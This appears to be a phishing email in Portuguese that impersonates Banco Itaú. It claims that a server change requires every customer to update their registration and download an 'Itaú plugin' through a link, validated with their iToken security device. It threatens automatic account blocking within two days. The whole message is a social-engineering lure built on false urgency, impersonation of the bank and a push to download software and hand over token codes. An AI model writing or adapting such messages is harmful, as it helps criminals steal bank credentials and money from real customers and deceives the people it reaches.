Prezado (a) Cliente, você está recebendo um informativo através do Banco Itaú.
O Banco Itaú informa que devido a grande demanda dos cadastros relacionadas á ICONTA, será
necessário que todos clientes Itaú faça a atualização cadastrais e atualização do Plugin Itáu,
o motivo está relacionado a troca de servidor Itáu,que está sendo muito congestionado devido a
diversos cadastro da ICONTA,e será necessário passar por este procedimento obrigatório,
caso nosso sistema não detectar a sua atualização cadastrais através do aplicativo,a sua conta
será bloqueada automaticamente em 2 dias e será desbloqueada somente com seu comparecimento em
sua agência. Utilize seu dispositivo de segurança iToken para
validar a operação de atualização cadastrais. Para iniciar siga o caminho abaixo indicado no link:
Clique no link abaixo
www.itau.com.br/atualizaçãoconta/download/
O processo é obrigatório para todos os clientes:
- Itaú Pessoa Física.
- Itaú Uniclass.
- Itaú Personnalité.
- Itaú Private Bank.
- Itaú Empresa.
- Itaú Empresa Plus.